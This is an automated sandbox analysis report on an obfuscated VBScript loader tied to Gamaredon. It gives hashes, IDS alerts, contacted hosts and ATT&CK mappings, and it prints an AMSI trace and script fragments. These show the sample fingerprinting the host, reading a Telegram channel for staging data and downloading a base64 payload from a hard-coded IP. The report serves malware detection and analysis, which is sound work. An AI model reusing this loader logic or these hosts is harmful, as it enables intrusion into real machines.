Edit tour

Windows Analysis Report
download (18).vbs

Overview

General Information

Sample Name:download (18).vbs
(renamed file extension from dat to vbs, renamed because original name is a hash value)
Original Sample Name:download (18).dat
Analysis ID:1299504
MD5:d54f6ef2c2acb61b58a45e618d16f5f6
SHA1:c92bf5d20884474cd18c6618e45cd960e9e2bfe4
SHA256:f053bfb3c3d133ebff9a7b2b600b52299c255549571d754c52e9dacd6707707d
Infos:

Detection

Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

System process connects to network (likely due to code injection or exploit)
VBScript performs obfuscated calls to suspicious functions
Snort IDS alert for network traffic
Potential malicious VBS script found (has network functionality)
Queries the volume information (name, serial number etc) of a device
Java / VBScript file with very long strings (likely obfuscated code)
Uses a known web browser user agent for HTTP communication
JA3 SSL client fingerprint seen in connection with other malware
IP address seen in connection with other malware
Found WSH timer for Javascript or VBS script (likely evasive script)
Abnormal high CPU Usage

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious
  • System is w10x64
  • wscript.exe (PID: 6328 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download (18).vbs" MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • cleanup
No configs have been found
No yara matches
No Sigma rule has matched
Timestamp:192.168.2.38.8.8.856157532046128 08/29/23-15:35:23.605876
SID:2046128
Source Port:56157
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.38.8.8.853304532046128 08/29/23-15:33:07.083148
SID:2046128
Source Port:53304
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.38.8.8.853493532046128 08/29/23-15:35:23.745784
SID:2046128
Source Port:53493
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected
Timestamp:192.168.2.38.8.8.855108532046128 08/29/23-15:33:07.228017
SID:2046128
Source Port:55108
Destination Port:53
Protocol:UDP
Classtype:A Network Trojan was detected

Click to jump to signature section

Show All Signature Results
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2

Networking

barindex
Source: C:\Windows\System32\wscript.exeDomain query: t.me
Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.154.167.99 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.18.104.89 80Jump to behavior
Source: TrafficSnort IDS: 2046128 ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru) 192.168.2.3:53304 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2046128 ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru) 192.168.2.3:55108 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2046128 ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru) 192.168.2.3:56157 -> 8.8.8.8:53
Source: TrafficSnort IDS: 2046128 ET TROJAN Gamaredon Domain in DNS Lookup (kemnebipa .ru) 192.168.2.3:53493 -> 8.8.8.8:53
Source: Initial file: lemonadeMcY.setrequestheader "user-agent" , guideduFK
Source: Initial file: lemonadeMcY.setrequestheader levelB39, marryingzhf
Source: Initial file: majorityp73 = parentsQKD(lemonadeMcY.responsebody)
Source: Initial file: glovesQk1.setrequestheader "user-agent" , birthY1r
Source: Initial file: glovesQk1.setRequestHeader "Referer", rused8C
Source: Initial file: glovesQk1.setRequestHeader "Cookie", "junk"
Source: Initial file: glovesQk1.setRequestHeader "Content-Length", "4552"
Source: Initial file: farewellgvp = parentsQKD(glovesQk1.responsebody)
Source: global trafficHTTP traffic detected: POST /s/rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meContent-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: global trafficHTTP traffic detected: GET /rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
Source: global trafficHTTP traffic detected: POST /s/rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meContent-Length: 0Connection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
Source: global trafficHTTP traffic detected: GET /rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Source: Joe Sandbox ViewIP Address: 149.154.167.99 149.154.167.99
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownTCP traffic detected without corresponding DNS query: 212.18.104.89
Source: unknownTCP traffic detected without corresponding DNS query: 212.18.104.89
Source: unknownTCP traffic detected without corresponding DNS query: 212.18.104.89
Source: wscript.exe, 00000000.00000002.898413009.000001FCFDF40000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.18.1
Source: wscript.exe, wscript.exe, 00000000.00000002.898198755.000001FCFC1D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881380040.000001FCFE453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://212.18.104.89/jessie/71.lbm?=DeleteFile
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3C3000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3AF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/(Z
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/F
Source: wscript.exe, 00000000.00000003.881380040.000001FCFE453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898574011.000001FCFE453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxf44
Source: wscript.exe, 00000000.00000002.898443899.000001FCFE200000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE448000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898574011.000001FCFE453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881403020.000001FCFE445000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881427766.000001FCFE446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxfttee
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxfttee3
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxfttee=
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxftteeO
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxftteeW
Source: wscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/rwmlqlxftteec
Source: wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/s/rwmlqlxfttee
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/s/rwmlqlxfttee&
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://t.me/s/rwmlqlxftteeXj
Source: wscript.exe, 00000000.00000002.898574011.000001FCFE453000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://telegram.org/img/t_logo.png
Source: wscript.exe, 00000000.00000003.881427766.000001FCFE446000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://web.telegram.org
Source: unknownHTTP traffic detected: POST /s/rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meContent-Length: 0Connection: Keep-AliveCache-Control: no-cache
Source: unknownDNS traffic detected: queries for: t.me
Source: global trafficHTTP traffic detected: GET /rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
Source: global trafficHTTP traffic detected: GET /rwmlqlxfttee HTTP/1.1Accept: */*Accept-Language: en-usUA-CPU: AMD64Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: t.meConnection: Keep-AliveCache-Control: no-cacheCookie: stel_ssid=de08e3f70d91333e83_15118461779691697602
Source: unknownHTTPS traffic detected: 149.154.167.99:443 -> 192.168.2.3:49756 version: TLS 1.2
Source: download (18).vbsInitial sample: Strings found which are bigger than 50
Source: C:\Windows\System32\wscript.exeProcess Stats: CPU usage > 49%
Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\download (18).vbs"
Source: classification engineClassification label: mal68.evad.winVBS@1/0@1/2
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
Source: C:\Windows\System32\wscript.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior

Data Obfuscation

barindex
Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: IWshShell3.ExpandEnvironmentStrings("%systemdrive%");IFileSystem3.GetDrive("C:");IDrive.SerialNumber();IWshShell3.ExpandEnvironmentStrings("%computername%");IServerXMLHTTPRequest2.open("post", "https://t.me/s/rwmlqlxfttee", "false");IServerXMLHTTPRequest2.setRequestHeader("user-agent", "Unsupported parameter type 00000000");IServerXMLHTTPRequest2.setRequestHeader("Unsupported parameter type 00000000", "Unsupported parameter type 00000000");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseBody();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.Type("2");_Stream.Charset("utf-8");_Stream.ReadText();_Stream.Close();IRegExp2.Pattern("==([0-9\@]+)==");IRegExp2.Multiline("true");IRegExp2.Global("true");IRegExp2.Execute("<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @rwmlqlxfttee</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&windo");IWshShell3.ExpandEnvironmentStrings("%systemdrive%");IFileSystem3.GetDrive("C:");IDrive.SerialNumber();IWshShell3.ExpandEnvironmentStrings("%computername%");IServerXMLHTTPRequest2.open("post", "https://t.me/s/rwmlqlxfttee", "false");IServerXMLHTTPRequest2.setRequestHeader("user-agent", "Unsupported parameter type 00000000");IServerXMLHTTPRequest2.setRequestHeader("Unsupported parameter type 00000000", "Unsupported parameter type 00000000");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseBody();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00002011");_Stream.Position("0");_Stream.Type("2");_Stream.Charset("utf-8");_Stream.ReadText();_Stream.Close();IRegExp2.Pattern("==([0-9\@]+)==");IRegExp2.Multiline("true");IRegExp2.Global("true");IRegExp2.Execute("<!DOCTYPE html><html> <head> <meta charset="utf-8"> <title>Telegram: Contact @rwmlqlxfttee</title> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <script>try{if(window.parent!=null&&windo");IMatchCollection2.Item("0");ISWbemServicesEx.ExecQuery("select * from win32_pingstatus where address='ReDim71.kemnebipa.ru'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("get", "http://212.18.104.89/jessie/71.lbm?=DeleteFile", "false");IServerXMLHTTPRequest2.setRequestHeader("user-agent", "mozilla/5.0 (windows nt 10.0; wow64) applewebkit/537.36 (khtml, like gecko) chrome/81.0.4044.138 yabr");IServerXMLHTTPRequest2.setRequestHeader("Referer", "Unsupported parameter type 00000000");IServerXMLHTTPRequest2.setRequestHeader("Cookie", "junk");IServerXMLHTTPRequest2.setRequestHeader("Content-Length", "4552");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseBody();_Stream.Type("1");_Stream.Open();_Stream.Write("Unsupported parameter type 00000000");_Stream.Position("0");_Stream.Type("2");_Stream.Charset("utf-8");_Stream.ReadText();_Stream.Close();IXMLDOMNode._00000029("base64");IXMLDOMEl
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wscript.exeWindow found: window name: WSH-TimerJump to behavior
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAWp,.
Source: wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3AF000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW

HIPS / PFW / Operating System Protection Evasion

barindex
Source: C:\Windows\System32\wscript.exeDomain query: t.me
Source: C:\Windows\System32\wscript.exeNetwork Connect: 149.154.167.99 443Jump to behavior
Source: C:\Windows\System32\wscript.exeNetwork Connect: 212.18.104.89 80Jump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid Accounts221
Scripting
Path Interception1
Process Injection
1
Process Injection
OS Credential Dumping1
Security Software Discovery
Remote ServicesData from Local SystemExfiltration Over Other Network Medium1
Encrypted Channel
Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization Scripts221
Scripting
LSASS Memory12
System Information Discovery
Remote Desktop ProtocolData from Removable MediaExfiltration Over Bluetooth3
Non-Application Layer Protocol
Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)1
Obfuscated Files or Information
Security Account Manager1
Remote System Discovery
SMB/Windows Admin SharesData from Network Shared DriveAutomated Exfiltration14
Application Layer Protocol
Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Binary PaddingNTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled Transfer1
Ingress Tool Transfer
SIM Card SwapCarrier Billing Fraud
Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet
behaviorgraph top1 signatures2 2 Behavior Graph ID: 1299504 Sample: download (18).dat Startdate: 29/08/2023 Architecture: WINDOWS Score: 68 13 Snort IDS alert for network traffic 2->13 15 Potential malicious VBS script found (has network functionality) 2->15 5 wscript.exe 12 2->5         started        process3 dnsIp4 9 212.18.104.89, 80 PPP-ASDE unknown 5->9 11 t.me 149.154.167.99, 443, 49756, 49758 TELEGRAMRU United Kingdom 5->11 17 System process connects to network (likely due to code injection or exploit) 5->17 19 VBScript performs obfuscated calls to suspicious functions 5->19 signatures5

This section contains all screenshots as thumbnails, including those not shown in the slideshow.


windows-stand
No Antivirus matches
No Antivirus matches
No Antivirus matches
No Antivirus matches
SourceDetectionScannerLabelLink
http://212.18.10%Avira URL Cloudsafe
http://212.18.104.89/jessie/71.lbm?=DeleteFile0%Avira URL Cloudsafe

Download Network PCAP: filteredfull

NameIPActiveMaliciousAntivirus DetectionReputation
t.me
149.154.167.99
truefalse
    high
    NameMaliciousAntivirus DetectionReputation
    https://t.me/rwmlqlxftteefalse
      high
      https://t.me/s/rwmlqlxftteefalse
        high
        NameSourceMaliciousAntivirus DetectionReputation
        https://t.me/wscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpfalse
          high
          https://t.me/(Zwscript.exe, 00000000.00000003.881434273.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2D6000.00000004.00000020.00020000.00000000.sdmpfalse
            high
            http://212.18.1wscript.exe, 00000000.00000002.898413009.000001FCFDF40000.00000004.00000020.00020000.00000000.sdmptrue
            • Avira URL Cloud: safe
            low
            https://t.me/rwmlqlxfttee=wscript.exe, 00000000.00000003.588501314.000001FCFE3C3000.00000004.00000020.00020000.00000000.sdmpfalse
              high
              https://t.me/s/rwmlqlxftteeXjwscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmpfalse
                high
                https://t.me/s/rwmlqlxfttee&wscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898219104.000001FCFC2B1000.00000004.00000020.00020000.00000000.sdmpfalse
                  high
                  https://web.telegram.orgwscript.exe, 00000000.00000003.881427766.000001FCFE446000.00000004.00000020.00020000.00000000.sdmpfalse
                    high
                    https://t.me/rwmlqlxftteecwscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpfalse
                      high
                      https://t.me/rwmlqlxf44wscript.exe, 00000000.00000003.881380040.000001FCFE453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898574011.000001FCFE453000.00000004.00000020.00020000.00000000.sdmpfalse
                        high
                        https://telegram.org/img/t_logo.pngwscript.exe, 00000000.00000002.898574011.000001FCFE453000.00000004.00000020.00020000.00000000.sdmpfalse
                          high
                          http://212.18.104.89/jessie/71.lbm?=DeleteFilewscript.exe, wscript.exe, 00000000.00000002.898198755.000001FCFC1D5000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000003.881380040.000001FCFE453000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmptrue
                          • Avira URL Cloud: safe
                          unknown
                          https://t.me/rwmlqlxftteeOwscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmp, wscript.exe, 00000000.00000002.898458756.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpfalse
                            high
                            https://t.me/Fwscript.exe, 00000000.00000003.881434273.000001FCFC2B9000.00000004.00000020.00020000.00000000.sdmpfalse
                              high
                              https://t.me/rwmlqlxfttee3wscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                high
                                https://t.me/rwmlqlxftteeWwscript.exe, 00000000.00000003.588501314.000001FCFE3F1000.00000004.00000020.00020000.00000000.sdmpfalse
                                  high
                                  • No. of IPs < 25%
                                  • 25% < No. of IPs < 50%
                                  • 50% < No. of IPs < 75%
                                  • 75% < No. of IPs
                                  IPDomainCountryFlagASNASN NameMalicious
                                  149.154.167.99
                                  t.meUnited Kingdom
                                  62041TELEGRAMRUfalse
                                  212.18.104.89
                                  unknownunknown
                                  8687PPP-ASDEtrue
                                  Joe Sandbox Version:38.0.0 Beryl
                                  Analysis ID:1299504
                                  Start date and time:2023-08-29 15:30:27 +02:00
                                  Joe Sandbox Product:CloudBasic
                                  Overall analysis duration:0h 8m 54s
                                  Hypervisor based Inspection enabled:false
                                  Report type:full
                                  Cookbook file name:default.jbs
                                  Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                  Number of analysed new started processes analysed:22
                                  Number of new started drivers analysed:0
                                  Number of existing processes analysed:0
                                  Number of existing drivers analysed:0
                                  Number of injected processes analysed:0
                                  Technologies:
                                  • HCA enabled
                                  • EGA enabled
                                  • HDC enabled
                                  • AMSI enabled
                                  Analysis Mode:default
                                  Analysis stop reason:Timeout
                                  Sample file name:download (18).vbs
                                  (renamed file extension from dat to vbs, renamed because original name is a hash value)
                                  Original Sample Name:download (18).dat
                                  Detection:MAL
                                  Classification:mal68.evad.winVBS@1/0@1/2
                                  EGA Information:Failed
                                  HDC Information:Failed
                                  HCA Information:
                                  • Successful, ratio: 100%
                                  • Number of executed functions: 0
                                  • Number of non-executed functions: 0
                                  Cookbook Comments:
                                  • Override analysis time to 240s for JS/VBS files not yet terminated
                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, WmiPrvSE.exe, svchost.exe, wuapihost.exe
                                  • Excluded domains from analysis (whitelisted): www.bing.com, ris.api.iris.microsoft.com, ReDim71.kemnebipa.ru, client.wns.windows.com, eudb.ris.api.iris.microsoft.com, ReDim54.kemnebipa.ru, displaycatalog.mp.microsoft.com, g.bing.com, arc.msn.com
                                  • Not all processes where analyzed, report is missing behavior information
                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                  • VT rate limit hit for: download (18).vbs
                                  No simulations
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  149.154.167.99KeyboardRGB.exeGet hashmaliciousUnknownBrowse
                                  • t.me/cinoshibot
                                  file.exeGet hashmaliciousCinoshi StealerBrowse
                                  • t.me/cinoshibot
                                  W6qKnnjMEiGet hashmaliciousAnubisBrowse
                                  • t.me/jhzljkhbsdklzjdlkzj281679827sjah
                                  snfstBXgxaGet hashmaliciousAnubisBrowse
                                  • t.me/cui8txvnmv
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  t.medownload (17).vbsGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  cQR4fkJcCk.exeGet hashmaliciousAmadey, LummaC Stealer, Mystic Stealer, RedLine, SmokeLoaderBrowse
                                  • 149.154.167.99
                                  0mp7o7ZR8A.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                  • 149.154.167.99
                                  H2xW8X8lKj.exeGet hashmaliciousAmadey, Djvu, Fabookie, RedLine, SmokeLoaderBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousAmadey, Glupteba, PrivateLoader, SmokeLoader, Vidar, XmrigBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  1.bin.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                  • 149.154.167.99
                                  2.bin.exeGet hashmaliciousBabuk, Clipboard Hijacker, Djvu, VidarBrowse
                                  • 149.154.167.99
                                  mh7jJjANa6.exeGet hashmaliciousDjvu, RedLine, SmokeLoaderBrowse
                                  • 149.154.167.99
                                  tnT41YJaPW.exeGet hashmaliciousLimeRAT, AsyncRAT, DcRat, Eternity Stealer, RedLine, zgRATBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousClipboard Hijacker, VidarBrowse
                                  • 149.154.167.99
                                  tDkUqzi4PG.exeGet hashmaliciousAgentTesla, Amadey, AsyncRAT, Fabookie, Lokibot, LummaC Stealer, RHADAMANTHYSBrowse
                                  • 149.154.167.99
                                  Payment INV09187632.emlGet hashmaliciousUnknownBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousRedLine, VidarBrowse
                                  • 149.154.167.99
                                  file.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  https://tttttt.me/antitantief3Get hashmaliciousUnknownBrowse
                                  • 95.216.186.40
                                  aRdg2eMZXQ.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  THawBZ42Ht.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  V6MYxI3w7I.exeGet hashmaliciousVidarBrowse
                                  • 149.154.167.99
                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                  TELEGRAMRUInvoice#1012_.txtGet hashmaliciousHTMLPhisherBrowse
                                  • 149.154.167.220
